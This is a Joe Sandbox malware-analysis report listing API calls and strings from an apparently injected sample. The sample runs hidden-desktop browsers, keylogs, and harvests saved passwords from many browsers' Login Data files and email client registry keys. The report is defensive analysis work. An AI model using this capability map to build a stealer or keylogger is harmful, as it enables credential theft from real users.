                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CountSleepTick
                                                                            • String ID:
                                                                            • API String ID: 2804873075-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ReleaseMutex.KERNEL32(?,?,0041141C,.VA,00405D32,.VA,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 004117A7
                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 004117AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ChangeCloseFindMutexNotificationRelease
                                                                            • String ID:
                                                                            • API String ID: 4264517613-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,?,00403156,?,00405D68,00000000,?,00412694,?,?,0041577A), ref: 00406037
                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,0041577A), ref: 0040603E
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 3859560861-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateProcess
                                                                            • String ID:
                                                                            • API String ID: 1357844191-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 3859560861-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,77C30770,?,?,0041270B,?,?), ref: 00412534
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$DispatcherEnvironmentExceptionExpandStringsUser
                                                                            • String ID:
                                                                            • API String ID: 1216311190-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004117B7: CreateMutexA.KERNELBASE(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,77C30770,00000000,00405B72), ref: 004117BF
                                                                            • WSAStartup.WS2_32(00000002,?), ref: 00405A4C
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateMutexStartup
                                                                            • String ID:
                                                                            • API String ID: 3730780901-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,77C30770,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 004112DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateEventlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2275612694-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,77C30770,00000000,00405B72), ref: 004117BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,0041274C,00000000,?,?,?,?,00000000,77C30770,00000000), ref: 00410C44
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateDirectory
                                                                            • String ID:
                                                                            • API String ID: 4241100979-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                                                              • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                                                              • Part of subcall function 0040594B: getaddrinfo.WS2_32(77C30770,00000000,00404FB9,00000000), ref: 00405998
                                                                              • Part of subcall function 0040594B: socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                                                              • Part of subcall function 0040594B: htons.WS2_32(00000000), ref: 004059D5
                                                                              • Part of subcall function 0040594B: freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                                                              • Part of subcall function 0040594B: connect.WS2_32(?,?,00000010), ref: 004059F1
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • Sleep.KERNELBASE(?,?,?,?,?,?,00000000,77C30770,00000000), ref: 00404FE6
                                                                              • Part of subcall function 0040577F: setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004057B6
                                                                              • Part of subcall function 0040577F: recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00405806
                                                                              • Part of subcall function 0040577F: recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405876
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWiderecv$FreeSleepVirtualconnectfreeaddrinfogetaddrinfohtonssetsockoptsocket
                                                                            • String ID:
                                                                            • API String ID: 3250391716-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 00406004
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateDesktopW.USER32 ref: 004136DC
                                                                              • Part of subcall function 00403373: lstrlenW.KERNEL32(77C30770,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 0040337A
                                                                            • AssocQueryStringW.SHLWAPI(00000000,00000002,http,open,?,00000000), ref: 00413722
                                                                            • PathFindFileNameW.SHLWAPI(?,?,?,?,?,?), ref: 0041372F
                                                                            • CreateProcessW.KERNEL32 ref: 004138E4
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?), ref: 004138EB
                                                                            • CreateProcessW.KERNEL32 ref: 00413953
                                                                            • CharLowerW.USER32(00000000,?,?,?,?,?), ref: 00413736
                                                                              • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • PathFindFileNameW.SHLWAPI(00000006,?,?,?,?,?), ref: 00413747
                                                                            • CharLowerW.USER32(00000000,?,?,?,?,?), ref: 0041374E
                                                                            • SHFileOperationW.SHELL32(?,00000000,\AppData\Local\GoogleBackup,?,00000000,\AppData\Local\Google\Chrome\User Data,?,chrome.exe,?,?,?,?,?), ref: 0041381F
                                                                            • CreateDirectoryW.KERNEL32(00000006,00000000,?,?,?,?,?), ref: 00413827
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$FilePathlstrlen$CharFindLowerNameProcess$AssocDesktopDirectoryDispatcherExceptionFolderFreeObjectOperationQuerySingleSpecialStringUserVirtualWaitlstrcat
                                                                            • String ID: --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11$ --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="$-no-remote -profile "$Path$Profile0$\AppData\Local\GoogleBackup$\AppData\Local\Google\Chrome\User Data$\AppData\Roaming\FirefoxBackup$\AppData\Roaming\Mozilla\Firefox\$\prefs.js$\xcopy.exe$chrome.exe$firefox.exe$http$iexplore.exe$open$profiles.ini$user_pref("layers.acceleration.disabled", true);$vnc$xcopy.exe /H /Y /E /C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetAsyncKeyState.USER32(00000010), ref: 00408176
                                                                            • CallNextHookEx.USER32(00000000,?,?,?), ref: 00408577
                                                                              • Part of subcall function 004085CB: GetForegroundWindow.USER32(?,?,?), ref: 004085F4
                                                                              • Part of subcall function 004085CB: GetWindowTextW.USER32 ref: 00408607
                                                                              • Part of subcall function 004085CB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                                                              • Part of subcall function 004085CB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 004086DE
                                                                              • Part of subcall function 004085CB: lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                                                              • Part of subcall function 004085CB: WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                                                            • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • \BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 0040BA7A
                                                                            • \Tencent\QQBrowser\User Data\Local State, xrefs: 0040BA08
                                                                            • \Google\Chrome\User Data\Local State, xrefs: 0040B99B
                                                                            • \Comodo\Dragon\User Data\Local State, xrefs: 0040BAAB
                                                                            • \Epic Privacy Browser\User Data\Local State, xrefs: 0040B9B6
                                                                            • \Opera Software\Opera Stable\Local State, xrefs: 0040BA24
                                                                            • \Comodo\Dragon\User Data\Default\Login Data, xrefs: 0040BAB0
                                                                            • \Google\Chrome\User Data\Default\Login Data, xrefs: 0040B9A0
                                                                            • \Torch\User Data\Local State, xrefs: 0040BAC6
                                                                            • \Torch\User Data\Default\Login Data, xrefs: 0040BACB
                                                                            • \Chromium\User Data\Default\Login Data, xrefs: 0040BA5F
                                                                            • \Microsoft\Edge\User Data\Local State, xrefs: 0040B9D1
                                                                            • \Chromium\User Data\Local State, xrefs: 0040BA5A
                                                                            • \Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0040BA0D
                                                                            • \Epic Privacy Browser\User Data\Default\Login Data, xrefs: 0040B9BB
                                                                            • \Opera Software\Opera Stable\Login Data, xrefs: 0040BA29
                                                                            • \Slimjet\User Data\Default\Login Data, xrefs: 0040BAE6
                                                                            • \Blisk\User Data\Default\Login Data, xrefs: 0040BA44
                                                                            • \CentBrowser\User Data\Default\Login Data, xrefs: 0040BB01
                                                                            • \UCBrowser\User Data_i18n\Local State, xrefs: 0040B9ED
                                                                            • \BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 0040BA75
                                                                            • \Vivaldi\User Data\Default\Login Data, xrefs: 0040BA95
                                                                            • \Blisk\User Data\Local State, xrefs: 0040BA3F
                                                                            • \CentBrowser\User Data\Local State, xrefs: 0040BAFC
                                                                            • \Vivaldi\User Data\Local State, xrefs: 0040BA8E
                                                                            • \Microsoft\Edge\User Data\Default\Login Data, xrefs: 0040B9D6
                                                                            • \UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 0040B9F2
                                                                            • \Slimjet\User Data\Local State, xrefs: 0040BAE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
                                                                            • String ID: \Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00408D21
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00408D90
                                                                            • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00408DAA
                                                                            • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 00408DB6
                                                                            • lstrcpyW.KERNEL32 ref: 00408DF0
                                                                            • lstrcatW.KERNEL32(?,004179E8), ref: 00408E03
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00411446: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00411473
                                                                            • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00408E86
                                                                            • wsprintfW.USER32 ref: 00408EBD
                                                                            • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010,?), ref: 00408EFF
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408F0F
                                                                            • RegisterClassW.USER32 ref: 00408F2E
                                                                            • CreateWindowExW.USER32 ref: 00408F46
                                                                            • GetMessageA.USER32 ref: 00408F67
                                                                            • TranslateMessage.USER32(?), ref: 00408F79
                                                                            • DispatchMessageA.USER32 ref: 00408F84
                                                                            • GetMessageA.USER32 ref: 00408F94
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$Create$FileHandlelstrcatlstrlen$ClassCloseDirectoryDispatchDispatcherExceptionFindFirstFolderLocalModulePathRegisterTimeTranslateUserWindowlstrcpywsprintf
                                                                            • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,77C2E710,746B8250,00000000,?,004099C3), ref: 00409A81
                                                                            • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,77C2E710,746B8250), ref: 00409AC8
                                                                            • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 00409B0C
                                                                            • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00409B50
                                                                            • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 00409B94
                                                                            • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00409BD8
                                                                            • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00409C45
                                                                            • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 00409CB2
                                                                            • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00409D1F
                                                                              • Part of subcall function 00409D97: GlobalAlloc.KERNEL32(00000040,-00000001,77C2E730,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                                                              • Part of subcall function 00409D97: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                                                              • Part of subcall function 00409D97: lstrcpyW.KERNEL32 ref: 00409E22
                                                                              • Part of subcall function 00403373: lstrlenW.KERNEL32(77C30770,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 0040337A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                                                            • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • LoadResource.KERNEL32(00000000,?,00000000), ref: 004151A4
                                                                            • SizeofResource.KERNEL32(00000000,?), ref: 004151B0
                                                                            • LockResource.KERNEL32(00000000), ref: 004151BA
                                                                            • GetTempPathA.KERNEL32(00000400,?), ref: 004151F4
                                                                            • lstrcatA.KERNEL32(?,find.exe), ref: 00415208
                                                                            • GetTempPathA.KERNEL32(00000400,?), ref: 00415216
                                                                            • lstrcatA.KERNEL32(?,find.db), ref: 00415224
                                                                            • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 0041523F
                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00415251
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00415258
                                                                            • wsprintfA.USER32 ref: 00415288
                                                                            • ShellExecuteExA.SHELL32(0000003C), ref: 004152D6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                                                            • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 0040B87D: lstrcpyW.KERNEL32 ref: 0040B8B9
                                                                              • Part of subcall function 0040B87D: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040B8C7
                                                                              • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                                                              • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                                                              • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                                                            • lstrcatW.KERNEL32(?,\firefox.exe), ref: 0040A3F1
                                                                            • GetBinaryTypeW.KERNEL32(?,?), ref: 0040A402
                                                                            • GetPrivateProfileStringW.KERNEL32 ref: 0040A882
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
